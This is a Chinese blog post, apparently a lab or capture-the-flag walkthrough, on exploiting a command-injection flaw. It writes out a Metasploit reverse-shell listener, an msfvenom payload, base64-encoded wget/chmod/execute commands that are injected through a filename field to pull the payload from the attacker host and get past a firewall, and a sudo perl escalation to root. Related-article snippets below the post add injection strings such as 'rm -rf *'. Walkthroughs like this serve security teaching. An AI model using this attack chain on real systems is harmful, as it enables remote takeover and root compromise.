命令注入漏洞(2)

最新推荐文章于 2022-05-10 18:08:48 发布
最新推荐文章于 2022-05-10 18:08:48 发布
阅读量406 收藏
点赞数
分类专栏: Web漏洞利用 文章标签: 网络安全 web 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/112602950
版权

命令注入漏洞(2)

  1. 其实我们除了使用上述的EXP文件进行漏洞利用外,我们还可以使用著名的metasploit进行漏洞的利用
  • 有这些标志表明均是可以使用metasploit利用的漏洞
    在这里插入图片描述
  1. 打开msfconsole进行漏洞利用和监听
msfconsole
set payload linux/x86/meterpreter_reverse_tcp
set lhost 192.168.101.45
exploit

在这里插入图片描述

  1. 生成一个静荷用于实现shell反弹
msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.101.45 lport=4444 -f elf > /var/www/html/shell

在这里插入图片描述

  1. 因为靶机要通过下载本机的webshell才能获得对应的权限,因此要开启apache2的服务
service apache2 start
service apache2 status

在这里插入图片描述

  1. 因为在实战中,我们常常会被防火墙屏蔽掉一些操作,因此我们这里使用base64加密的方式,对我们的命令进行加密进行防火墙的绕过
  • 注:为什么要使用-O重定向到/tmp目录呢?因为tmp目录对于任何用户来说都有可读的权限
echo 'wget http://本机ip/shell -O /tmp/shell' | base64

在这里插入图片描述

  • 然后提升文件的权限,赋予最高权限
echo 'chmod 777 /tmp/shell' | base64

在这里插入图片描述

  • 然后执行该webshell文件
echo '/tmp/shell'|base64

在这里插入图片描述

  1. 使用burpsuite进行抓包,对filename变量的值进行替换,点击send
    在这里插入图片描述
  • 因为这里在同一个窗口中对filename的值更改两次的话,服务器会将请求重定向,因此我们必须重新抓包对filename的值进行多次修改,小编这里为了防止出错,分别新建了三个csv文件
    在这里插入图片描述
    在这里插入图片描述
  • shell成功反弹
    在这里插入图片描述
    注意:小编也是尝试了许多遍才成功,一次不行就多次尝试,有时候是人为失误,有时候是服务器的问题,一旦response出现302就证明操作失败
  1. 进入后使用shell命令查看当前用户,发现是www-data账户
    在这里插入图片描述
  • 使用sudo -l查看当前用户拥有哪些超级管理员执行的用户文件
  • 发现能使用perl命令执行perl文件
    在这里插入图片描述
  • 那就来执行操作吧
perl -e "exec '/bin/bash' "
bash -i
  • 提权成功,进入/root查看flag.txt的内容
    在这里插入图片描述
    在这里插入图片描述

总结:其实使用metasploit确实能够提高漏洞利用的效率,但是重点是绕过防火墙那一步,实战中经常会被防火墙过滤一些操作,因此使用base64加密是很常见的一种绕过实战操作

平凡的学者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
OpenSSL命令注入漏洞 (CVE-2022-1292)分析与防护
不忘初心,护天下安全!
10-07 5177
OpenSSL是 OpenSSL团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。OpenSSL存在远程代码执行漏洞漏洞编号CVE-2022-1292。该漏洞是由于c_rehashc脚本未正确清理shell元字符的问题,未经授权的攻击者可通过构造恶意数据,从而执行系统命令,导致远程代码执行。
命令注入漏洞原因以及危害
居上
10-25 4980
命令注入-笔记命令注入(OS)原因漏洞危害相关函数和语言结构漏洞利用防御方法| 和 ||,& 和 && 的区别 命令注入(OS) 原因 当应用需要调用一些外部程序时会用到一些系统命令的函数。应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入情况下,会造成命令执行漏洞漏洞危害 1、继承Web 服务器程序权限,去执行系统命令 2、继承Web 服务器权限,读取文件 3、反弹Shell 4、控制整个网站 5、控制整个服务器
DVWA关卡2:Command Injection(命令注入漏洞)
m0_54899775的博客
12-06 1068
DVWA关卡2:Command Injection(命令注入漏洞)
华域Reporter命令注入漏洞
江左盟的博客
09-22 1万+
概述 一个偶然的机会听说华域Reporter组件存在漏洞,团队大佬在GitHub找到了漏洞利用代码:HuaYuReporterGetShell。该组件的设备较多,多用于上网行为管理设备的报表系统,该漏洞利用难度低,影响范围较广,无需登录可直接以root权限执行任意命令,从而控制该设备,进而控制内网其它服务器和终端设备,该设备一旦被控制,可能会影响到整个内网。 反编译jar 使用jd-gui查看jar包源码发现漏洞所在文件:/view/Behavior/toQuery.php,参数和Payload,如图:
黑客零基础第三章-Web漏洞利用实战-命令注入Kioptrix Level 2
ShadowBlade
08-16 2568
第三节内容讲述了Web命令注入漏洞和原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 如果靶机部署有疑问,请留言! 1.信息收集 kali IP为192.168.17.4 发现靶机IP192.168.17.5 使用第二章nmap命令扫描靶机, nmap -p `nmap -p- --min-rate=10000 ..
命令注入漏洞
weixin_42021056的博客
05-10 236
1.概念 2.示例 如下图所示,target为外部传入参数,正常为ping +域名|ip,但是如果参数校验不足,target如果是127.0.0.1;ls;rm -rf * 则存在严重安全漏洞 3.常用漏洞利用payload 多语句分号: ; 条件执行: && || 管道符号:| ...
安全测试8_Web安全实战3(命令注入
weixin_30246221的博客
01-24 179
 1、命令注入的概念:命令指的是操作系统的命令注入表示通过WEB程序在服务器上拼接系统命令。  2、命令注入实战: 首先我们先打开DVWA,将安全级别调至为low级别,忘记了的可以参考之前的章节进行设置,然后我们去到Command Injection进行测试。 由图可知,这里让我们输入ip地址,我们输入127.0.0.1,咦,发现返回值与我们的系统ping命令返回很像,于是我们在cmd...
openssh-9.6.tar.gz版本,最新版本修复openssh命令注入漏洞
最新发布
01-17
openssh-9.6.tar.gz版本,最新版本修复openssh命令注入漏洞,OpenSSH是使用SSH协议进行远程登录的首要连接工具。它对所有流量进行加密,以消除窃听、连接劫持和其他攻击。此外,OpenSSH提供了一大套安全隧道功能、几...
commix-testbed:网页集合,容易受到命令注入漏洞攻击
05-02
Commix-testbed是现实场景的集合,易受命令注入漏洞的影响,用于评估的检测和利用能力: 注射方案。 注入方案。 注入方案。 注入方案。 方案。 () 截屏 安装 通过克隆官方Git存储库下载commix-testbed: git clone https://github.com/commixproject/commix-testbed.git commix-testbed ...或使用commix- 。 错误和增强 有关错误报告或有关混合的增强功能,请打开一个。
命令注入总结
weixin_44576725的博客
12-15 6902
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
命令注入(Command Injection)
qq_17762247的博客
05-10 1039
一、Low 1、服务端代码 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shel
常见的Web漏洞——命令注入
江左盟的博客
09-29 1万+
目录 命令注入简介 命令注入原理 漏洞利用 漏洞防范 总结 命令注入简介 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令web应用中,如内容管理系统(CMS)等。 命令注入原理 本文以DVWA中的Command Injection为例,查看...
Web安全——命令注入漏洞详解
Boom!脑洞大爆炸的博客
06-09 1万+
手把手入门命令注入漏洞
命令执行漏洞详解
weixin_42566218的博客
03-08 1万+
一、命令执行漏洞原理 在编写程序的时候,当碰到要执行系统命令来获取一些信息时,就要调用外部命令的函数,比如php中的exec()、system()等,如果这些函数的参数是由用户所提供的,那么恶意用户就可能通过构造命令拼接来执行额外系统命令,比如这样的代码 <?php system("ping -c 1 ".$_GET['ip']); ?> 程序的本意是让用户传入一个ip地址去测试网络连通性,但是由于参数不可控,当我们传入的ip参数为"127.0.0.1;id“时,执行的命令就便成了
1-Web安全——命令执行注入攻击
网络安全
09-06 7422
1. 系统命令执行 通常在程序开发过程中,应用程序需要调用一些外部程序时会用到一些系统命令相关函数。 例如在linux系统中,shell解释器就是用户和系统进行交互的一个接口,对用户的输入进行解析并在系统中执行。而shell脚本语言就是linux系统由各种shell命令组成的程序,具有其他普通编程的很多特点。 2. Web命令执行 常用的ASP,PHP,JSP等web脚本解释语言支持动态执行在运行时生成的代码这种特点,可以帮助开发者根据各种数据和条件动态修改程序代码,这对于开发人员来说是有利的.
chmod命令原理及用法详解
热门推荐
lyy14011305的博客
07-29 5万+
Chmod命令主要用于修改、设置文件权限 chmod 修改文件权限主要有两种方式: 字母法与数字法 虽然数字法相对字母法简单,但是数字法是基于字母法,所以这里先介绍字母法。 1、字母法:chmod  (u g o a)   (+ - =)   (r w x)   (文件名) 以上是chmod的用法,每个括号是一个参数, 前三个括号主要放在一起使用即 chmod + 设置模式 + 文件名;下
Command Injection命令注入攻击
要啥啥不行,偷懒第一名
10-21 919
实验目的与要求 1.了解命令注入攻击攻击带来的危险性。 2.掌握命令注入攻击攻击的原理与方法 3.掌握防范攻击的方法 预备知识 在PHP中您可以使用下列5个函数来执行外部的应用程序或函数。 (1) system:执行一个外部的应用程序并显示输出的结果。 (2) exec:执行一个外部的应用程序。 (3) passthru:执行一个UNIX系统命令并显示原始的输出。 (4) shell_exec:执行shell命令并返回输出的字符串。 (5) "``"运算符:与shell_exec函数
Web安全:深入解析命令注入漏洞
命令注入漏洞产生的主要原因有两方面: 1. **外部参数可控**:应用使用了诸如system、eval、exec等函数,这些函数能够执行系统命令,而攻击者可以通过浏览器或其他客户端向这些函数提交恶意参数,使得系统执行攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值